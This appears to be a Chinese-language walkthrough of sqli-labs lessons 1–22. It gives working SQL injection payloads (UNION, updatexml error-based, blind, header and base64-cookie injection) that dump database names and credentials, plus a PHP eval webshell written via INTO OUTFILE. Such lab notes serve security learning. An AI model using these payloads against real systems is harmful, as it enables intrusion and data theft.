文章目录
刷的时候是按照题号刷的,笔记按注入类型/页面title作了分类。
这些分类之间其实是有交叉的,比如报错注入和Double注入。
有些没有加标题的就是题型重复,只不过换一下闭合符号。
一. 报错注入
个人觉得第一部分应该也属于Double Inject,但靶场标题是error based,保持一致吧。
1. GET-Single Quotes单引号
-- 判断是否有注入====
-- 注释也可以用--+
?id=1' and 1=1 -- x
?id=1' and 1=1 -- +
?id=1' and 1=2 -- x
-- 判断查询列数====
?id=1' order by 3 -- x
?id=1' order by 4 -- x
-- 报错后用union语句显示自己的select结果====
?id=100' union select 1, 2, 3 -- x
-- Your Login name:2
-- Your Password:3
-- 库名====
?id=100' union select 1, database(), 3 -- x
-- Your Login name:security
-- 表名====
?id=100' union select 1, table_name, 3 from information_schema.tables where table_schema="security" -- x
-- Your Login name:emails
?id=100' union select 1, table_name, 3 from information_schema.tables where table_schema="security" limit 3,1 -- x
-- Your Login name:users 对users这种名称的表要重点关注
-- 列名====
?id=100' union select 1, column_name, 3 from information_schema.columns where table_schema="security" and table_name="emails" -- x
-- Your Login name:id
?id=100' union select 1, column_name, 3 from information_schema.columns where table_schema="security" and table_name="emails" limit 1,1 -- x
-- Your Login name:email_id
?id=100' union select 1, group_concat(column_name), 3 from information_schema.columns where table_schema="security" and table_name="emails" -- x
-- Your Login name:id,email_id
-- 获取数据====
?id=100' union select 1, 2, 3 from emails limit 1,1-- x
Your Login name:1
下面搞一下users表:
-- users列
?id=100' union select 1, column_name, 3 from information_schema.columns where table_schema="security" and table_name="users" limit 1,1 -- x
-- Your Login name:username
?id=100' union select 1, column_name, 3 from information_schema.columns where table_schema="security" and table_name="users" limit 2,1 -- x
-- Your Login name:password
-- 获取数据
?id=100' union select 1, username, password from users limit 1,1 -- x
-- Your Login name:Angelina
-- Your Password:I-kill-you
看下源码sql语句:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
注意:
group_concat虽然可以查询出很多数据,但如果输出限制了长度,就有问题了(比如字符串被截断),所以建议用limit一个一个查(脚本)。
2. GET-Integer整型
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
和less-1一样,跳过。
3. GET-Double Quotes with Twist 单引号+括号
?id=100') union select 1, 2, 3 -- x
源码:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
4. GET-Double Quotes双引号
?id=100") union select 1, 2, 3 -- x
源码:
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
11. POST-Single Quotes
像登录这样的post请求,直接用所谓的万能账户/密码输入就行了(相当于判断有无注入):
' or 1=1 -- x
-- Your Login name:Dumb
-- Your Password:Dumb
进一步判断字段数,以及搭配union语句:
' or 1=1 order by 3 -- x
' union select 1,2 -- x
后面就和GET类型的第1题一样了:
-- 数据库名
' union select 1, database() -- x
-- 表名
' union select 1, table_name from information_schema.tables where table_schema='security' -- x
' union select 1, table_name from information_schema.tables where table_schema=0x7365637572697479 -- x
-- 列名
' union select 1, column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1 -- x
' union select 1, column_name from information_schema.columns where table_schema='security' and table_name=0x656d61696c73 limit 1,1 -- x
-- 获取数据
' union select id,email_id from emails limit 0,1 -- x
源码sql如下:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
12.
相比11题,闭合从单引号变成双引号加括号("")
:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
二. 双查询注入Double Inject
基本上所有payload都属于Double Injection吧。。
Double Injection,可以译作 ”双查询注入“,在一条查询语句当中包含一条select语句。
在SQL注入中有时会遇到这样的情况:若SQL语句正确,则页面正常返回,但返回的页面中不包含任何有用的信息;而当SQL语句错误时,页面会显示SQL错误信息。
最常用的双查询注入,就是updatexml。第二个参数不是有效的xPath时就会报错。
5. GET-Single Quotes单引号
判断有无注入:
?id=1 and 1=1 -- x
?id=1 and 1=2 -- x
?id=1' and 1=1 -- x
?id=1' and 1=2 -- x
?id=1' -- 报错
后面尝试获取字段数,无论如何构造,都不能显示有用的信息,于是考虑用updatexml。
?id=1' and updatexml(1,
concat(0x7e,
(select database()),
0x7e),
1) -- x
-- 转成一行
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
-- XPATH syntax error: '~security~'
然后替换select database()
这个语句就行了。
-- 表名
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),0x7e),1) -- x
-- XPATH syntax error: '~emails~'
-- 列名
?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1),0x7e),1) -- x
-- XPATH syntax error: '~email_id~'
-- 数据
?id=1' and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1),0x7e),1) -- x
-- XPATH syntax error: '~Dumb@dhakkan.com~'
源码sql语句和第一题一样,只不过不会输出查询结果了:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
// ...
}
else
{
//...
print_r(mysql_error());
//...
}
6. GET-Double Quotes双引号
把第5题的单引号换成双引号就可以了:
?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
13. POST-Single Quotes with Twist
页面标题告诉我们,闭合符号时单引号加括号。
username输入万能账户') or 1=1 -- x
,登录成功。
然后根据5、6题改下就行。获取库名如下:
') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
源码:
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//...
}
else
{
//...
print_r(mysql_error());
//...
}
14.
13题闭合符号改成双引号就行了,这个页面的题目有误~
" and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
源码:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//...
}
else
{
//...
print_r(mysql_error());
//...
}
三. dump into outfile
读取敏感文件或写webshell,常用mysql的file系列函数如下:
- into dumpfile()
- into outfile()
- load_file()
这个操作需要在配置文件my.ini里开启对应开关:
[mysqld]
secure_file_priv=
...
- NULL,表示禁止;
- 如果value值有文件夹目录,则表示只允许该目录下文件(PS:测试子目录也不行);
- 如果为空,则表示不限制目录。
没有开启时mysql命令里相关的查询:
mysql> show global variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | NULL |
+--------------------------+-------+
3 rows in set, 1 warning (0.02 sec)
开启后:
mysql> show global variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | |
+--------------------------+-------+
7. GET-outfile
判断注入:
?id=1' -- x
order by和union试了几次都提示有语法错误,最后看源码原来是需要两个括号来闭合:
?id=1')) -- x
然后就会提示You are in.... Use outfile......
。
还是需要用order by判断列数(还是3列):
?id=1')) order by 4 -- x
可以开始写马了:
?id=1')) union select 1,"<?php eval($_REQUEST[111])?>",3 into outfile "C://bd.php" -- x
访问后就会在c盘生成后门,但这里通过..
无法访问c盘。所以想要建立webshell的话还得获取www绝对路径。
四. 盲注Blind Injection
没有任何回显信息(如报错)时,要考虑盲注。
布尔型盲注依赖字符串处理函数。
时间型盲注依赖sleep(), 以及if(exp1, exp2, exp3)
条件语句。
手工盲注会很累,当然可以写脚本,不过注意sleep一下,避免频繁发包被目标拉黑。
8. GET-Boolian-Single Quotes
先走一遍第1题的套路,判断注入、判断列数、union查询。
相比第5题,去掉了mysql_error
,也就是说没有任何回显信息了。
这种时候就要考虑盲注了。
布尔盲注,可以从判断注入的payload入手:
?id=1' and 1=1 -- x
如果后端开发考虑的特别严谨,回显都一样,那就要用时间盲注
利用and后的表达式,猜解数据库名称长度:
?id=1' and length(database())=8 -- x
然后逐个字母破解数据库名:
?id=1' and ascii(substr(lower(database()),1,1))=115 -- s
?id=1' and ascii(substr(lower(database()),2,1))=101 -- e
?id=1' and ascii(substr(lower(database()),3,1))=99 -- c
?id=1' and ascii(substr(lower(database()),4,1))=117 -- u
?id=1' and ascii(substr(lower(database()),5,1))=114 -- r
?id=1' and ascii(substr(lower(database()),6,1))=105 -- i
?id=1' and ascii(substr(lower(database()),7,1))=116 -- t
?id=1' and ascii(substr(lower(database()),8,1))=121 -- y
然后猜表名:
?id=1' and ascii(substr(lower(
(select table_name from information_schema.tables where table_schema=database() limit 0,1)
),1,1))=101 -- x
猜字段名:
?id=1' and ascii(substr(lower(
(select column_name from information_schema.columns where table_name='emails' limit 0,1)
),1,1))=105 -- x
二分法(26 == 13 * 2)可能会稍微快点。
9. GET-TimeBased-Single Quotes
?id=1' and 1=1 -- x
?id=1' and 1=2 -- x
以上payload回显一样,使用时间盲注。
?id=1' and if(length(database())=8, sleep(5), 1) -- x
F12看网络响应时间为5秒,所以数据库名长度为8。
剩余流程和布尔盲注一样。
10.
第9题单引号变成双引号就行了。
15. POST-Single quotes
题目提示是单引号闭合。
万能用户' or 1=1 -- x
登录成功。
用' or 1=1 order by 3 -- x
, 以及updatexml判断字段数,都没有回显错误信息,应该是又去掉了print_r(mysql_error())
。
所以使用盲注。
' or length(database())=8 -- x
回显登录成功。
后面的步骤就和第8题一样了:
' or ascii(substr(lower(database()),1,1))=115 -- s
16.
相比15题,闭合从单引号变成双引号加括号("")
五. update query
17. POST-error based
这一页面是用来重置密码的,提供了username和new password两个输入框。
用万能账户密码测试,均回显失败。
页面顶部有[PASSWORD RESET] Dhakkan
字样,所以就用Dhakkan作为用户名来测试(别的页面是welcome Dhakkan)。
new password用updatexml试一下。
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) -- x
成功返回库名。
再次强调下updatexml注意事项:
- 这里应该是在update语句,and 和or可以都试试。
- 字符串最好用十六进制(虽然这里可以用引号)。
- 别忘了limit。
继续查询:
-- 表名
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) -- x
-- XPATH syntax error: '~emails~'
-- 列名
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='emails' limit 1,1),0x7e),1) -- x
-- XPATH syntax error: '~email_id~'
-- 获取数据
' or updatexml(1,concat(0x7e,(select email_id from emails limit 1,1),0x7e),1) -- x
-- XPATH syntax error: '~Angel@iloveu.com~'
但是,尝试查询users表获取账户密码时出了问题:
' or updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1) -- x
--You can't specify target table 'users' for update in FROM clause
它说不能指定users为查询表。
这时可以用子查询来绕过:
' or updatexml(0,concat(0x7e, (select username from (select username from users limit 0,1)a), 0x7e),1) -- x
-- XPATH syntax error: '~Dumb~'
看下源码:
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
// 单/双引号,空格,NULL 加反斜杠
// php 5.4.0以后废弃,返回FALSE
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
//...
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
if (mysql_error())
{
print_r(mysql_error());
}
else
{
//...
}
//...
}
else
{
//...
}
}
六. Header Injection
先介绍一下http请求头
- User-Agent: 客户端浏览器的信息,可用来判断返回pc还是手机页面;
- Referer: 请求中 URI 的原始获取方,可理解为上一个页面;
- Accept: Content-Types: 客户端或代理能够处理的媒体类型及媒体类型(的相对优先级);
- X-Forwarded-For: 请求端真实 IP。
这一部分需要使用bp或zap抓包,篡改请求包后转发。
18. POST-UAgent Field
直接看下源码吧:
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
print_r(mysql_error());
}
else
{
print_r(mysql_error());
}
}
username和password都做了检查,而且必须登录成功才会执行insert逻辑。但是uagent变量没有做检查过滤,先篡改试试:
User-Agent: ' database()
重发后,页面确实提示语法错误:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database()', '10.10.10.1', 'Dhakkan')' at line 1
研究一下insert语句,构造查询库名的payload:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('
' and updatexml(1, concat(0x7e, (select database()) ,0x7e) ,1)
,1,1
) -- value
, '$IP', $uname)";
|
|
v
' and updatexml(1,concat(0x7e,(select database()),0x7e),1),1,1) -- value
-- XPATH syntax error: '~security~'
获取库名成功。
继续查询。 需要注意,insert和update一样,and和or都试一下,,
-- 表名
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),0x7e),1),1,1) -- value
-- XPATH syntax error: '~emails~'
-- 列名
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1),0x7e),1),1,1) -- value
-- XPATH syntax error: '~email_id~'
-- 数据
' or updatexml(1,concat(0x7e,(select email_id from emails limit 1,1),0x7e),1),1,1) -- value
-- XPATH syntax error: '~Angel@iloveu.com~'
19. POST-Referer
相比18题,ua换成了Referer:
$uagent = $_SERVER['HTTP_REFERER'];
//...
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
print_r(mysql_error());
构造下payload:
"INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('
' and updatexml(1, concat(0x7e, (select database()) ,0x7e) ,1)
,1
) -- value
', '$IP')";
|
|
v
' and updatexml(1, concat(0x7e, (select database()) ,0x7e),1),1) -- value
-- XPATH syntax error: '~security~'
20. POST-Cookie
登录后显示的信息很多:
YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50
YOUR IP ADDRESS IS : 10.10.10.1
DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
YOUR COOKIE : uname = dhakkan and expires: Thu 17 Feb 2022 - 17:27:41
Your Login name:dhakkan
Your Password:aaaa
Your ID:12
另外还有一个删除cookie的按钮。
之后再刷新这个页面,还是会显示这些信息。点击删除cookie按钮后,就会再次出现表单。
也就是说,后台会存储cookie到数据库里。抓包看看:
Cookie: uname=dhakkan; PHPSESSID=f287cam7hcr6kum7s39cmiem95
看下源码:
<?php
if (!isset($_COOKIE['uname']))
{
// 还没登录,走登录流程
function check_input($value)
{
// ...
}
if (isset($_POST['uname']) && isset($_POST['passwd'])) {
// username和password都经过了过滤
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if ($row1) {
// 数据库有这个用户,设置cookie并重定向(刷新)
setcookie('uname', $cookee, time() + 3600);
header('Location: index.php');
print_r(mysql_error());
} else {
print_r(mysql_error());
}
}
}
else {
// 已经登录
if (!isset($_POST['submit']))
{
// 显示很多信息
$cookee = $_COOKIE['uname'];
//...
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1"; //!!!!!!!!!!!!!
$result = mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if ($row) {
//...
echo 'Your Login name:' . $row['username'];
echo 'Your Password:' . $row['password'];
echo 'Your ID:' . $row['id'];
} else {
//...
}
//...
}
else
{
// 点击删除按钮
echo " Your Cookie is deleted";
setcookie('uname', $row1['username'], time() - 3600);
header('Location: index.php');
}
}
?>
关键是通过cookie里的用户名查询用户的select语句:
$sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
把Cookie修改成引号就会报错:
Cookie: uname=dhakkan'
构造payload:
-- 列数
"SELECT * FROM users WHERE username='
dhakkan' order by 4 -- x
' LIMIT 0,1"
Cookie: uname=dhakkan' order by 4 -- x
-- Issue with your mysql: Unknown column '4' in 'order clause'
"SELECT * FROM users WHERE username='
dhakkan' union select 1,2,3 limit 1,1-- x
' LIMIT 0,1"
Cookie: uname=dhakkan' union select 1,2,3 limit 1,1-- x
这个union语句去掉limit就会返回两行,我们需要确定第2行的占位:
Your Login name:2
Your Password:3
Your ID:1
继续构造payload:
"SELECT * FROM users WHERE username='
dhakkan' union select database()
,(select table_name from information_schema.tables where table_schema='security' limit 0,1)
,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1)
limit 1,1-- x
' LIMIT 0,1"
|
|
v
Cookie: uname=dhakkan' union select database(),(select table_name from information_schema.tables where table_schema='security' limit 0,1),(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1) limit 1,1-- x
返回:
Your Login name:emails
Your Password:email_id
Your ID:security
获取数据用updatexml试试,也没问题:
"SELECT * FROM users WHERE username='
dhakkan' and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1),0x7e),1)-- x
' LIMIT 0,1"
|
|
v
uname=dhakkan' and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1),0x7e),1)-- x
-- XPATH syntax error: '~Dumb@dhakkan.com~'
21. POST-Cookie-Base64-Single Quotes and Parenthesis
登录dhakkan后发现cookie被base64加密了(两个等号):
YOUR COOKIE : uname = ZGhha2thbg==
将20题的union语句加个括号,再用zap的编码工具base64编码:
dhakkan') union select 1,2,3 limit 1,1-- x
-->base64
ZGhha2thbicpIHVuaW9uIHNlbGVjdCAxLDIsMyBsaW1pdCAxLDEtLSB4
-->填入cookie
Cookie: uname=ZGhha2thbicpIHVuaW9uIHNlbGVjdCAxLDIsMyBsaW1pdCAxLDEtLSB4
可以在响应页面看到占位:
Your Login name:2
Your Password:3
Your ID:1
继续填充占位,获取库名,表名,列名:
dhakkan') union select database(),(select table_name from information_schema.tables where table_schema='security' limit 0,1),(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1) limit 1,1-- x
-->编码填入cookie
Cookie: uname=
ZGhha2thbicpIHVuaW9uIHNlbGVjdCBkYXRhYmFzZSgpLChzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIGxpbWl0IDAsMSksKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnICBsaW1pdCAxLDEpIGxpbWl0IDEsMS0tIHg=
响应:
Your Login name:emails 表名
Your Password:email_id 列名
Your ID:security 库名
用updatexml获取一个邮箱:
dhakkan') and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1),0x7e),1)-- x
-->编码填入cookie
Cookie: uname=ZGhha2thbicpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGVtYWlsX2lkIGZyb20gZW1haWxzIGxpbWl0IDAsMSksMHg3ZSksMSktLSB4
-->响应
XPATH syntax error: '~Dumb@dhakkan.com~'
看下源码:
<?php
if (!isset($_COOKIE['uname'])) {
// 没登录
function check_input($value)
{
//...
}
if (isset($_POST['uname']) && isset($_POST['passwd'])) {
// 过滤项
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if ($row1) {
setcookie('uname', base64_encode($row1['username']), time() + 3600); // !!!!!!!!!!!!!!
//...
print_r(mysql_error());
//...
header('Location: index.php');
} else {
print_r(mysql_error());
// ...
}
}
} else {
// 已登录
if (!isset($_POST['submit'])) {
// 显示信息
$cookee = $_COOKIE['uname'];
//...
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee); // !!!!!!!!!!!!!!
echo "<br></font>";
$sql = "SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result = mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if ($row) {
echo 'Your Login name:' . $row['username'];
echo 'Your Password:' . $row['password'];
echo 'Your ID:' . $row['id'];
} else {
//...
}
} else {
// 删除cookie
echo " Your Cookie is deleted";
setcookie('uname', base64_encode($row1['username']), time() - 3600);
header('Location: index.php');
}
}
?>
22.
21题闭合改成双引号就行了。